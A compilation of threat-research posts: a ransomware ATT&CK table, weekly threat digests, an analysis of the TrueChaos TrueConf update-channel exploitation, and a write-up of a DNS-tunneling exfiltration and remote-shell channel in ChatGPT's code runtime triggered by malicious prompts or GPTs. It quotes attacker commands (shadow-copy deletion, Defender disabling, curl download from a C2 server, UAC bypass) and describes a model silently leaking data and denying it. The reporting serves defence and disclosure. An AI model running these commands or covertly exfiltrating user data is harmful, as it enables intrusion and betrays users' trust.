DiscoveryFile and Directory Discovery (T1083)cmd.exe /C dir c:\\users; reading internal files (e.g., Chinese language “公司主機紀錄.txt”) on file servers via UNC paths.
DiscoverySoftware Discovery: Security Software Discovery (T1518.001)wmic product where Name like '%kaspe%' get Name, IdentifyingNumber executed to identify installed Kaspersky (or similar) security products.
DiscoveryNetwork Service Scanning (T1046(partly inferred)While explicit port scans are not shown, large‑scale multi‑protocol lateral attempts via PsExec, WMI, remote services, and scheduled tasks after pinging hosts imply service reachability probing.
Lateral MovementRemote Services: SMB/Windows Admin Shares (T1021.002)Payloads dropped to \\\\<hostname>\\ADMIN$\\<random>.exe\\\\<target>\\C$\\Temp\\<exe>; share share$=C:\\Temp created and ACLs widened via icacls to support anonymous/Everyone access.
Lateral MovementRemote Services: RPC (T1021.001)Cobalt Strike and subsequent ransomware payloads executed over RPC from the Domain Controller after being copied to admin shares.
Lateral MovementRemote Services & Service Execution (T1021.001 + T1569.002)psexec \\\\<target> -accepteula -d -s/-h ... for remote execution, along with remote sc create/sc start to run services DefSvcUpdateSvc*.
Lateral MovementRemote Services: Windows Remote Management (T1021.006)PowerShell Invoke-Command -ComputerName <target> -ScriptBlock {...} used to disable Defender, set exclusions, and start lockers on remote machines.
Lateral MovementWindows Management Instrumentation (T1047)wmic /node:<target> process call create "<DEFENDER_SCRIPT_A>" and wmic /node:<target> process call create "C:\\Temp\\<exe> <creds>" to run scripts and lockers remotely.
Lateral MovementScheduled Task/Job: Scheduled Task (T1053.005)Remote scheduled tasks (DefUDefSUpdateGU*UpdateGS*) created on numerous hosts and executed with /S <target> and /Run.
Lateral MovementLateral Tool Transfer (T1570)Locker copied using xcopy "<exe>" "\\\\<target>\\C$\\Temp\\" /Y /I /C /H /R /K and accessible via \\\\<host>\\share$\\<exe> from remote systems.
Lateral MovementRemote Services: RDP (T1021.001)RDP access enabled via reg add ...\\Terminal Server /v fDenyTSConnections /d 0 /f and firewall rule enabling “Remote Desktop” group, supporting interactive lateral movement.
Lateral MovementIngress Tool Transfer (T1105)Internal HTTP server on DC offers grand.exe on port 8080, fetched via PowerShell downloadfile(...) to c:\\programdata\\r.exe.
Command and ControlProxy: Multi‑hop Proxy (T1090.003)SystemBC (socks.exe) deployed; attempts outbound C2 to 45.86.230[.]112; acts as encrypted SOCKS proxy for C2 tunneling and pivoting.
Command and ControlIngress Tool Transfer (T1105)Cobalt Strike payloads and ransomware components transferred via HTTP, SMB (ADMIN$C$), and NETLOGON share as part of C2 and staging.
Command and ControlApplication Layer Protocol: Web Protocols (T1071.001)Cobalt Strike beacon from rundll32.exe to 91.107.247[.]163 using ports 443 and later 80 (HTTPS/HTTP).
Command and ControlEncrypted Channel: Asymmetric Cryptography (T1573.002)Cobalt Strike uses encrypted HTTPS; SystemBC uses RC4‑encrypted tunnel over SOCKS; both provide encrypted C2 channels.
ExfiltrationExfiltration Over C2 Channel (T1041)Ransom note claims “We have exfiltrated all your confidential and business data (including NAS, clouds, etc.)”; details not shown, but implies data exfiltration via C2/remote access tooling (Cobalt Strike, SystemBC, AnyDesk).
Impact (Extortion)Data Destruction in Extortion (T1654)Threats of “irreversible wipe of all data and your network” if victim attempts restoration or refuses to negotiate, coupled with timed leak‑site publication.
Impact (Extortion)Financial Theft / Extortion (T1657)Classic double‑extortion: demands payment for decryption and to prevent public leak; uses Tox IDs, Session, Tor blog tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion, and X account TheGentlemen25.
ImpactData Encrypted for Impact (T1486)Multi‑OS lockers encrypt data (Windows/Linux/ESXi); for large files only 1–9% (depending on --fast/--superfast/--ultrafast) is encrypted with XChaCha20; per‑file footer includes --eph--<base64>--marker--GENTLEMEN\\nGENTLEMEN[...]--.
ImpactInhibit System Recovery (T1490)Shadow copies removed via vssadmin delete shadows /all /quiet and wmic shadowcopy delete$Recycle.Bin removed; logs and prefetch deleted; optional --wipe mode overwrites free space with wipefile.tmp.
ImpactService Stop (T1489)Services (including firewall mpssvc and likely AV/backup) stopped and disabled via sc stop <service> and sc config <service> start=disabled.
ImpactDefacement: Internal Defacement (T1491.001)Desktop background changed to embedded gentlemen.bmp written to %TEMP% and applied via SystemParametersInfoW, signaling compromise to victims.

The post DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy appeared first on Check Point Research.

13th April – Threat Intelligence Report

By: urias
13 April 2026 at 15:11

For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, including personnel records, internal affairs material, and unredacted personal information.
  • ChipSoft, a Dutch healthcare software vendor whose HiX platform is used by hospitals across the Netherlands, has suffered a ransomware attack that forced it to disable patient and provider services. Multiple hospitals disconnected from its systems, disrupting operations, and the company warned that the threat actor may have gained unauthorized access to patient data.
  • Ransomware group Qilin has taken responsibility for a cyber-attack targeting German political party Die Linke, which forced the party to shut down its IT infrastructure in late March. The party said membership databases were unaffected, while Qilin threatens to leak stolen sensitive employee and party information.

Check Point Endpoint and Threat Emulation provide protection against these threats (Ransomware.Wins.Qilin*)

  • Bitcoin Depot, a US cryptocurrency ATM operator with more than 25,000 kiosks and checkout locations, has disclosed a cyberattack that allowed attackers to steal credentials tied to digital asset settlement accounts. The attackers transferred more than 50 BTC worth more than $3.6M from company-controlled wallets before access was blocked.

AI THREATS

  • Researchers identified GrafanaGhost, an attack against Grafana’s AI components that can silently exfiltrate enterprise data by chaining indirect prompt injection with image URL validation bypass. The technique can expose financial, infrastructure, and customer information in the background, and Grafana has already addressed the weakness.
  • Researchers outlined AI Agent Traps, a framework describing six web-based attack classes that can manipulate autonomous AI agents through malicious content. The methods can inject hidden instructions, poison reasoning, corrupt memory, and steer tool use, showing how web pages can turn agent workflows into attack surfaces.
  • Researchers measured a growing AI supply chain risk, finding that third-party API routers for AI models can hijack agent tool calls to alter commands and steal credentials. In testing, several routers injected malicious code, abused intercepted cloud keys, and even triggered wallet theft from a researcher environment.

VULNERABILITIES AND PATCHES

  • CISA warns of active exploitation of Ivanti CVE-2026-1340, a critical code injection flaw in Endpoint Manager Mobile that allows unauthenticated remote code execution and full compromise of affected servers. The vulnerability carries a CVSS score of 9.8, affects multiple 12.5 through 12.7 releases, and has been exploited in the wild.

Check Point IPS provides protection against this threat (Ivanti Endpoint Manager Mobile Code Injection (CVE-2026-1340))

  • Adobe Reader is affected by an actively exploited zero-day that uses malicious PDF files to invoke privileged features on fully updated systems, enabling local data theft. Researchers said the activity has run since at least December 2025, uses Russian-language oil and gas lures, and may also enable further compromise.
  • Marimo maintainers released a fix for CVE-2026-39987, a critical remote code execution flaw in the Marimo Python notebook that allowed attackers to open a terminal without authentication and run commands. Exploitation was observed within hours of disclosure against internet-exposed instances, and fixes are available in version 0.23.0.
  • Fortinet has fixed CVE-2026-35616, a critical improper access control flaw in FortiClient EMS that enables unauthenticated code or command execution through crafted requests. The issue been actively exploited in the wild, prompting Fortinet to release an emergency hotfix.

THREAT INTELLIGENCE REPORTS

  • Check Point Research have analyzed March 2026’s threat landscape, with organizations averaging 1,995 weekly attacks. Education remained the most targeted sector, ransomware rose to 672 incidents led by Qilin, Akira, and DragonForce, and GenAI exposure remained high across enterprise environments.
  • Researchers discovered a coordinated software supply chain campaign that planted 36 malicious npm packages impersonating Strapi plugins. The packages executed on installation to search for secrets, maintain command and control, and in some cases enable Redis remote code execution, credential harvesting, and direct PostgreSQL exploitation.
  • Researchers linked Storm-1175, a financially motivated group associated with Medusa ransomware, to high-velocity exploitation of n-day and zero-day flaws. Microsoft said the actor moves quickly from initial access to data theft and ransomware deployment, sometimes weaponizing vulnerabilities within a day and heavily impacting healthcare, education, finance, and services.
  • Researchers identified a hack-for-hire campaign linked to BITTER APT that targeted journalists, activists, and government figures across the Middle East and North Africa. The operators used phishing to access iCloud backups and Signal accounts, and deployed Android spyware disguised as messaging applications to take over victim devices.

The post 13th April – Threat Intelligence Report appeared first on Check Point Research.

6th April – Threat Intelligence Report

By: urias
6 April 2026 at 13:21

For the latest discoveries in cyber research for the week of 30th March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The European Commission, the European Union’s executive body, has confirmed a data breach after its Europa.eu platform was compromised through a third-party exchange linked to the Trivy supply chain attack. The incident affected at least one Amazon Web Services account and resulted in data theft, while websites and internal systems remained operational.
  • Global toys and games manufacturing giant Hasbro has disclosed a cyberattack after detecting unauthorized access to its network on March 28. Some systems were taken offline, and the company warned that recovery could take weeks and cause delays.
  • Cryptocurrency trading platform Drift Protocol on Solana has suffered a major breach after an attacker gained enough Security Council approvals to execute pre-signed transactions on April 1. Drift said roughly $280 million was affected, froze platform activity, and stated the incident did not involve a smart contract flaw or seed phrase compromise.
  • Luxury camping providers Roan and Eurocamp have experienced a data breach that exposed guest names, email addresses, phone numbers, travel destinations, booking dates, and prices. Attackers are using the stolen data in WhatsApp payment scams, while the companies said the flaw was patched and no passwords or payment data were taken.

AI THREATS

  • Check Point Research demonstrated a hidden outbound channel in ChatGPT’s execution runtime that enabled silent exfiltration of user data. A single malicious prompt or a backdoored GPT could transmit chat content and uploaded files to attackers through DNS.
  • Check Point warns that based on leaked details about Anthropic’s Claude “Mythos”, the model will likely accelerate vulnerability discovery, exploit development, and multi-step attack automation. The new capabilities could sharply reduce time to exploit and make advanced offensive techniques more broadly accessible.
  • Researchers examined six AI agents and found that impersonation and fabricated urgency can push them to disclose data or take harmful actions. In testing, an agent forwarded 124 emails containing personal and financial details, while others deleted files and reassigned admin access.
  • Researchers observed a flaw in Google Cloud’s Vertex AI Agent Engine that could let attackers extract service agent credentials and pivot into customer projects. The exposed privileges enabled access to storage and Artifact Registry resources, and permissive OAuth scopes also increased the risk of wider Google Workspace exposure.

VULNERABILITIES AND PATCHES

  • Cisco released urgent fixes for CVE-2026-20093, a critical authentication bypass in its Integrated Management Controller software used across ENCS 5000, Catalyst 8300 uCPE, and UCS C-Series M5 and M6 servers. Remote attackers can reset any account, including Admin, allowing full device takeover.
  • Researchers discovered CVE-2026-5281, a zero-day memory flaw in Chrome’s WebGPU component, Dawn, that also impacts Edge, Brave, Opera, and other Chromium-based browsers. The vulnerability is being actively exploited and can enable code execution on user systems, prompting inclusion in CISA’s Known Exploited Vulnerabilities catalog.
  • Progress has addressed two critical ShareFile vulnerabilities, including CVE-2026-2699 with a CVSS score of 9.8, that can be chained for unauthenticated remote code execution. The flaws let attackers reach restricted configuration pages and upload arbitrary files to the server without logging in to affected installations.
  • F5 reclassified CVE-2025-53521, a BIG-IP Access Policy Manager vulnerability, as a critical remote code execution flaw under active exploitation. More than 14,000 internet-exposed systems were still visible online, and the company published indicators of compromise and rebuild guidance for affected devices.

THREAT INTELLIGENCE REPORTS

  • Check Point Research has unmasked TrueChaos, a campaign exploiting a 0-day vulnerability (CVE-2026-3502) in TrueConf’s on-premises update process to push malicious updates to Southeast Asian government networks. Attackers delivered Havoc payloads through trusted servers, and the activity was assessed with moderate confidence as being affiliated with a Chinese nexus.
  • Check Point Research have outlined an Iran-nexus password-spraying campaign against Microsoft 365 in the Middle East, conducted in three waves during March. The activity focused on Israel and the UAE, targeting municipalities and using Tor and VPN infrastructure to evade geofencing and complicate attribution.
  • Check Point Research have uncovered coordinated tax-season phishing and malware activity, with hundreds of newly registered tax-themed domains and rising risk levels. In March 2026, one in ten new domains was flagged as risky, while IRS-impersonating sites harvested personal data and Spain-themed emails delivered malware loaders.
  • Researchers documented a supply chain compromise of the Axios npm package, a widely used HTTP client with millions of monthly downloads, that briefly pushed malicious releases delivering a remote access trojan. The tampered versions used a hidden dependency to fetch a second-stage payload and erase traces after installation.

The post 6th April – Threat Intelligence Report appeared first on Check Point Research.

Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets

31 March 2026 at 15:16

Key Points

  • Check Point Research identified a zero-day vulnerability in the TrueConf client application, tracked as CVE-2026-3502, with a CVSS score of 7.8. The flaw stems from the abuse of TrueConf’s updater validation mechanism, allowing an attacker who controls the on-premises TrueConf server to distribute and execute arbitrary files across all connected endpoints.
  • This vulnerability has been exploited in-the-wild as part of a targeted campaign we call “TrueChaos” against government entities in Southeast Asia, where the threat actor abused the TrueConf update mechanism to deploy the Havoc payload to vulnerable machines.
  • Based on the observed TTPs, command and control infrastructure and victimology, we assess with moderate confidence that this activity is associated with a Chinese-nexus threat actor.
  • Check Point Research responsibly disclosed this vulnerability to TrueConf. Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was released in March 2026. The current version of the desktop apps is 8.5.2.

Introduction

At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via a legitimate TrueConf software installed in the targets’ environment. The investigation led to the discovery of a zero-day vulnerability in the TrueConf client, tracked as CVE-2026-3502 with a CVSS score of 7.8. The flaw affects the application’s updater validation mechanism and allows an attacker controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints.

TrueConf is a video conferencing platform that supports both on-premises and cloud deployments and is used across multiple regions, most prominently in Russia, as well as in East Asia, Europe, and the Americas. Serving more than 100,000 organisations globally, their global customers range from key governments and defense departments and critical infrastructure industries to significant businesses such as banks, power and TV stations. In enterprise environments, its on-premises architecture creates a trusted relationship between the central server and connected clients, especially through the platform’s update mechanism.

Basically, TrueConf acts as an on-premises video conferencing solution that operates entirely within a private local network (LAN) without requiring an internet connection. It is primarily used by government, military, and critical infrastructure sectors to ensure absolute data privacy and communication autonomy in secure or remote environments. In locations with poor or no internet connectivity, or during natural disasters when traditional networks are down, it facilitates essential coordination. By hosting the server on internal hardware, all audio, video, and chat traffic remains strictly contained on-site, with offline activation available for fully air-gapped systems.

In this particular case, that trust was abused to deliver malware due to improper validation in the update process. In the observed in-the-wild activity, operation “TrueChaos”, the threat actor used the trusted update channel of a centrally managed on-premises TrueConf server to distribute malicious updates to multiple connected government agencies in a South Eastern country.

The victimology and regional focus of the campaign suggest an espionage-motivated operation. In combination with the observed TTPs and command-and-control infrastructure, these indicators point with moderate confidence to a Chinese-nexus threat actor.

About TrueConf

TrueConf is a video conferencing platform that supports both on-premises and cloud deployments. Although it is most widely used in Russia, it also has a notable presence across parts of East Asia, Europe, and the Americas. To better understand the potential scope of the vulnerability, we reviewed internet exposed TrueConf servers to assess the platform’s geographic distribution and the possible reach of the attack. This view is necessarily incomplete, as many TrueConf deployments may operate entirely in on-premises environments and remain inaccessible from the public internet.

Figure 1 – Geographic Distribution of Internet-Exposed TrueConf Servers

CVE-2026-3502 Root Cause Analysis

When the TrueConf client starts, it checks the connected on-premises server for available updates. If the server has a newer client version than the one installed, the application prompts the user to download the update from https://{trueconf_server}/downlods/trueconf_client.exe, which maps to the file stored on the server under C:\Program Files\TrueConf Server\ClientInstFiles\.

Figure 2 – TrueConf Application Update Prompt

TrueConf client update starts when the client detects a version mismatch in favor of the TrueConf on-premises server, the client alerts the user that a newer version is available and offers to download it.

Figure 3 – Updating TrueConf Client Without Reinstalling The Server https://trueconf.com/docs/server/en/admin/info/

The vulnerability stems from the lack of integrity and authenticity checks in this update flow. An attacker who gains control of the on-premises TrueConf server can replace the expected update package with an arbitrary executable, presented as the current application version, and distribute it to all connected clients. Because the client trusts the server-provided update without proper validation, the malicious file can be delivered and executed under the guise of a legitimate TrueConf update.

Figure 4 – TrueConf Client’s Settings Page https://trueconf.com/docs/server/en/admin/info/

In-The-Wild Exploitation

The infections began when TrueConf client application launched, probably by a link sent to the target from the attacker. This link launched the already installed TrueConf client and presented an update prompt claiming that a newer version was available.

Prior to the victim’s interaction, the attacker had already replaced the update package on the TrueConf on-premises server with a weaponized version, ensuring that the client retrieved a malicious file through the normal update process.

The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update.

Analysis of the downloaded package showed that it was a weaponized client update. The installation was built by Inno Setup. It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2. Alongside the legitimate TrueConf installation components, the package dropped a benign poweriso.exe executable and a malicious 7z-x64.dll file to the path c:\programdata\poweriso\, which was then loaded through DLL side-loading.

Figure 5 – Malicious Client Update Attack Chain

Using the malicious 7z-x64.dll implant, the attacker performed a series of hands-on-keyboard actions focused on reconnaissance, environment preparation, persistence, and the retrieval of additional payloads.

Figure 6 - Attacker Hands-on-Keyboard Activity
Figure 6 – Attacker Hands-on-Keyboard Activity
  • Initial reconnaissance included commands such as:
    • tasklist > cache
    • tracert 8.8.8.8 -h 5
  • Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory:
    • curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x update.7z -p <redacted>
  • The attacker then modified the current user’s PATH variable, in order to preform UAC bypass by using the Microsoft iSCSI Initiator Control Panel tool:
    • reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\<redacted>\appdata\local\temp" /f c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe

iscsicpl.exe is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64 version is auto-elevated and is vulnerable to DLL search-order hijacking for iscsiexe.dll. By placing a malicious iscsiexe.dll in a user-controlled location referenced through the user’s %PATH%, an attacker can cause Windows to resolve and load that DLL in the context of the elevated iscsicpl.exe, resulting in privilege escalation without a UAC prompt.

The downloaded update.7z archive contained a legitimate 7z.exe binary alongside iscsiexe.dll, a component used by the attackers as part of the post-compromise workflow. Check Point Research also identified additional variants of the archive that included an encrypted 7z archive named rom.dat. At the time of analysis, the contents and purpose of rom.dat remained unclear.

The iscsiexe.dll component appears to be a simple, custom persistence and privilege escalation tool. Rather than serving as a full-featured backdoor, its role was limited to maintaining execution of winexec.exe, which is the renamed poweriso.exe binary dropped earlier in the infection chain.

Figure 7 - Pseudo-Code of iscsiexe.dll
Figure 7 – Pseudo-Code of iscsiexe.dll

Although Check Point Research did not recover the exact final-stage payload associated with the malicious 7z-x64.dll activity, it observed network communication to 47.237.15[.]197, an attacker-controlled server running Havoc C2 infrastructure, and also identified Havoc demon sample linked to actor C2 infrastructure. Based on this combined evidence, Check Point Research assesses with high confidence that the missing payload was a Havoc implant.

Havoc is an open-source post-exploitation framework intended for penetration testing and adversary emulation, but it has also been repeatedly abused by threat actors in real-world intrusions, including Chinese-nexus Amaranth Dragon activity recently documented by Check Point Research.

Attribution

Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor. The assessment is based on a combination of factors, including TTPs consistent with Chinese-nexus operations such as DLL sideloading, the use of Alibaba Cloud and Tencent hosting for command-and-control infrastructure and the victimology aligns with Chinese nexus strategic interests.

We also observed that the same victim was targeted within the same time frame by ShadowPad malware framework. This may indicate overlap in operator tooling, shared access, or the presence of multiple China-aligned actors targeting the same organization in parallel.

Conclusion

The exploitation of CVE-2026-3502 did not require the attacker to compromise each endpoint individually. Instead, the attacker abused the trusted relationship between a central on-premises TrueConf server and its clients. By replacing a legitimate update with a malicious one, they turned the product’s normal update flow into a malware distribution channel across multiple connected government networks.

From a research perspective, this case shows how monitoring and analysing routine execution techniques can uncover far more significant threats. What initially appeared to be a signed binary used for DLL sideloading ultimately led to the discovery of a zero-day vulnerability in TrueConf’s update validation mechanism.

Hunting Recommendations

In order to identify whether you have been compromised, review the following indicators and hunting opportunities across the affected system: 

  • Check whether trueconf_windows_update.exe is unsigned, as an unsigned update executable may indicate that the file is suspicious or has been tampered with.
  • Treat the system as potentially infected if C:\ProgramData\PowerISO\poweriso.exe is present on disk, especially if this file is not expected in your environment.
  • Treat the system as potentially infected if the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe, as this indicates persistence through a user logon autorun entry.
  • Treat the system as potentially infected if files such as %AppData%\Roaming\Adobe\update.7z, 7za.exe, iscsiexe.dll, or rom.dat are present, or if there is evidence that they were recently created and then deleted.
  • Hunt for file creation activity in which trueconf_windows_update.tmp creates C:\ProgramData\PowerISO\poweriso.exe or 7z-x64.dll, as this behavior is consistent with the observed delivery chain.
  • Hunt for poweriso.exe spawning commands through cmd.exe, particularly when the command line includes tools or utilities such as curl, winrar.exe, or netstat, since this may indicate download, extraction, or discovery activity.
  • Hunt for the suspicious parent-child process chain trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp -> any executable, as this sequence may reveal execution of the malicious payload.

Indicators of Compromise

trueconf_windows_update.exe – Malicious TrueConf client update
22e32bcf113326e366ac480b077067cf

iscsiexe.dll – Loader
9b435ad985b733b64a6d5f39080f4ae0

7z-x64.dll – Havoc implant
248a4d7d4c48478dcbeade8f7dba80b3

43.134.90[.]60 – Havoc C2
43.134.52[.]221 – Havoc C2
47.237.15[.]197 – Havoc C2

The post Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets appeared first on Check Point Research.

ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime

30 March 2026 at 15:09

Key Takeaways

  • Sensitive data shared with ChatGPT conversations could be silently exfiltrated without the user’s knowledge or approval.
  • Check Point Research discovered a hidden outbound communication path from ChatGPT’s isolated execution runtime to the public internet.
  • A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content.
  • A backdoored GPT could abuse the same weakness to obtain access to user data without the user’s awareness or consent.
  • The same hidden communication path could also be used to establish remote shell access inside the Linux runtime used for code execution.

What Happened

AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask questions about taxes, debts, and personal finances, upload PDFs, contracts, lab results, and identity-rich documents that contain names, addresses, account details, and private records. That trust depends on a simple expectation: data shared in the conversation remains inside the system.

ChatGPT itself presents outbound data sharing as something restricted, visible, and controlled. Potentially sensitive data is not supposed to be sent to arbitrary third parties simply because a prompt requests it. External actions are expected to be mediated through explicit safeguards, and direct outbound access from the code-execution environment is restricted.

Figure 1 – ChatGPT presents outbound data leakage as restricted and safeguarded.
Figure 1 – ChatGPT presents outbound data leakage as restricted and safeguarded.

Our research uncovered a path around that model.

We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation.

Video 1 – During a ChatGPT conversation, user content summary is silently transmitted to an external server without warning or approval.

The Intended Safeguards

ChatGPT includes useful tools that can retrieve information from the internet and execute Python code. At the same time, OpenAI has built safeguards around those capabilities to protect user data. For example, the web-search capability does not allow sensitive chat content to be transmitted outward through crafted query strings. The Python-based Data Analysis environment was designed to prevent internet access as well. OpenAI describes that environment as a secure code execution runtime that cannot generate direct outbound network requests.

Figure 2 – Screenshot showing blocked outbound Internet attempt from inside the container.
Figure 2 – Screenshot showing blocked outbound Internet attempt from inside the container.

OpenAI also documents that so called GPTs can send relevant parts of a user’s input to external services through APIs. A GPT is a customized version of ChatGPT that can be configured with instructions, knowledge files, and external integrations. GPT “Actions” provide a legitimate way to call third-party APIs and exchange data with outside services. Actions are useful for enterprise workflows, access to internal business systems, customer support operations, and other integrations that connect ChatGPT to external services, including simpler use cases such as travel or weather lookups. The key point is visibility: the user sees that data is about to leave ChatGPT, sees where it is going, and decides whether to allow it.

Figure 3 – GPT Action approval dialog showing the destination and the data that will be sent.
Figure 3 – GPT Action approval dialog showing the destination and the data that will be sent.

In other words, legitimate outbound data flows are designed to happen through an explicit, user-facing approval process.

From One Message to Silent Exfiltration

From a security perspective, the obvious attack surfaces looked strong. The ability to send chat data through tools not designed for that purpose was strictly limited. Sending data through a legitimate GPT integration using external API calls also required explicit user confirmation.

The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis. Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation. As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user’s perspective.

At a high level, the attack began when the victim sent a single malicious prompt into a ChatGPT conversation. From that moment on, each new message in the chat became a potential source of leakage. The scope of that leakage depended on how the prompt framed the task for the model: it could include raw user text, text extracted from uploaded files, or selected model-generated output such as summaries, medical assessments, conclusions, and other condensed intelligence. This made the attack flexible, because it allowed the attacker to target not only original user data, but also the most valuable information produced by the model itself.

That attack pattern fits naturally into ordinary user behavior. The internet is full of websites, blog posts, forums, and social media threads promoting “top prompts for productivity,” “best prompts for work,” and other ready-made instructions that supposedly improve ChatGPT’s performance. For many users, copying and pasting such prompts into a new conversation is routine and does not appear risky, because the prevailing expectation is that AI assistants will not silently leak conversation data to external parties, and that this boundary cannot be changed through an ordinary prompt. A malicious prompt distributed in that format could therefore be presented as a harmless productivity aid and interpreted as just another useful trick for getting better results from the assistant.

A broader campaign could use an even more convincing lure: prompts advertised as a way to unlock premium capabilities for free. Claims about enabling Pro-level behavior, hidden modes, or advanced features on a lower-tier account would give the attacker a natural pretext for including unusual instructions, long text blocks, or opaque fragments that might otherwise seem suspicious. Because the user already expects a nonstandard sequence, those elements can easily be perceived as part of the promised “hack.” A carefully crafted prompt could then create the appearance of enhanced functionality while quietly turning the conversation into a source of exfiltrated data.

Figure 4 – Social engineering example: a malicious prompt disguised as a trick to unlock premium features.

Once the malicious prompt was placed into the chat, the conversation effectively became a covert collection channel. From that point on, summaries of subsequent user messages could be silently transmitted to an attacker-controlled server. As shown in Video 1, this took place without any warning, approval request, or other visible indication of external data transfer.

Malicious GPTs

The same attack pattern becomes even more dangerous when embedded inside a custom GPT.

GPTs allow developers to package instructions, knowledge files, and external integrations into a reusable assistant that other users can interact with. From the user’s perspective, the interaction looks like a normal ChatGPT conversation with a specialized tool.

In that scenario, the attacker no longer needs to rely on the victim copying a prompt from an external source. The malicious logic can be embedded directly in the GPT’s instructions and files. A user only needs to open the GPT and begin interacting with it as intended.

This changes the threat model significantly. Officially, GPT builders do not have access to individual user conversations with their GPTs. However, a GPT designed to exploit the vulnerability could still cause selected information from those conversations to be transmitted to an attacker-controlled server. From the user’s perspective, the interaction would remain indistinguishable from an ordinary session with a specialized assistant.

To demonstrate the practical impact of the vulnerability, we built a proof of concept around a sensitive scenario: a GPT acting as a personal doctor.

Video 2 – PoC: a “personal doctor” GPT exfiltrates patient identity and medical assessment.

In the demonstration, the user uploaded a PDF containing laboratory test results. The document also contained personal information, including the patient’s name. The user then described symptoms and asked the GPT to help interpret the results.

From the user’s perspective, the interaction looked completely ordinary. The GPT analyzed the document and produced a medical assessment based on the provided information.

When asked directly whether the uploaded data had been sent anywhere, ChatGPT answered confidently that it had not, explaining that the file was only stored in a secure internal location. At the same time, the user saw no approval prompts or warnings about external data transfer, unlike the confirmation dialogs that normally appear when a GPT Action sends information to a third-party service.

Figure 5 – ChatGPT denies external data transfer while the remote server receives extracted data.
Figure 5 – ChatGPT denies external data transfer while the remote server receives extracted data.

Meanwhile, the attacker’s server received highly sensitive data extracted from the conversation: the patient’s identity taken from the uploaded document together with the model’s medical assessment.

This illustrates an important aspect of the attack. The attacker does not necessarily need to steal entire documents. Instead, the prompt could instruct the model to transmit the most valuable information it produces. In the medical scenario, that meant the patient’s identifying details together with the model’s assessment. In other contexts, it could mean financial conclusions, contract summaries, or strategic insights extracted from long documents.

From Data Exfiltration to Remote Shell

The same communication channel could be used for more than silent data exfiltration.

Once a reliable bidirectional channel existed between the execution runtime and the attacker-controlled server, it became possible to send commands into the container and receive the results back through the same path. In effect, the attacker could establish a remote shell inside the Linux environment that ChatGPT creates to perform code execution and data analysis tasks.

Video 3 – PoC: remote shell access inside the ChatGPT runtime through the covert channel.

This interaction happened outside the normal ChatGPT response flow. When users interact with the assistant through the chat interface, generated actions and outputs remain subject to the model’s safety mechanisms and checks. However, commands executed through the side channel bypassed that mediation entirely. The results were returned directly to the attacker’s server without appearing in the conversation or being filtered by the model.

DNS Tunneling in an AI Runtime

The side channel that enabled both data exfiltration and remote command execution relied on DNS resolution.

Normally, DNS is used to resolve domain names into IP addresses. From a security perspective, however, DNS can also function as a data transport channel. Instead of using DNS only for ordinary name resolution, an attacker can encode data into subdomain labels and trigger resolution of those hostnames. Because DNS resolution propagates the requested hostname through the normal recursive lookup process, the resolver chain can carry that encoded data outward.

In our case, this mattered because the ChatGPT execution runtime did not permit conventional outbound internet access, but DNS resolution was still available as part of the environment’s normal operation. Standard attempts to reach external hosts directly were blocked. DNS, however, still provided a narrow communication path that crossed the isolation boundary indirectly through legitimate resolver infrastructure.

To exfiltrate data, content could be encoded into DNS-safe fragments, placed into subdomains, and reconstructed on the attacker’s side from the incoming queries. To send instructions back, the attacker could encode small command fragments into DNS responses and let them travel back through the same resolution path. A process running inside the container could then read those responses, reassemble the payload, and continue the exchange.

Figure 5 – DNS tunneling flow.
Figure 5 – DNS tunneling flow.

This effectively turned DNS infrastructure into a tunnel between the isolated runtime and an attacker-controlled server. The tunnel create in this way is sufficient for two practical goals: silently leaking selected data from the conversation and maintaining command execution inside the Linux environment created for code execution and data analysis.

Conclusion

Check Point Research reported the issue to OpenAI. OpenAI confirmed that it had already identified the underlying problem internally, and the fix was fully deployed on February 20, 2026.

The broader lesson, however, goes beyond this specific case. AI systems are evolving at an extraordinary pace. New capabilities are constantly being introduced, enabling assistants to solve complex mathematical problems, analyze large datasets, generate and execute scripts, and automate multi-step tasks that previously required dedicated development environments. These capabilities bring enormous benefits. At the same time, every new tool expands the system’s attack surface and can introduce new security challenges for both users and platform providers.

Modern AI assistants increasingly operate as real execution environments. They read files, run code, search in the web while processing highly sensitive information such as medical records, financial data, legal documents, and other personal or organizational data. Protecting these environments requires careful control over every possible outbound communication path, including infrastructure layers that users never see.

As AI tools become more powerful and widely used, security must remain a central consideration. These systems offer enormous benefits, but adopting them safely requires careful attention to every layer of the platform.

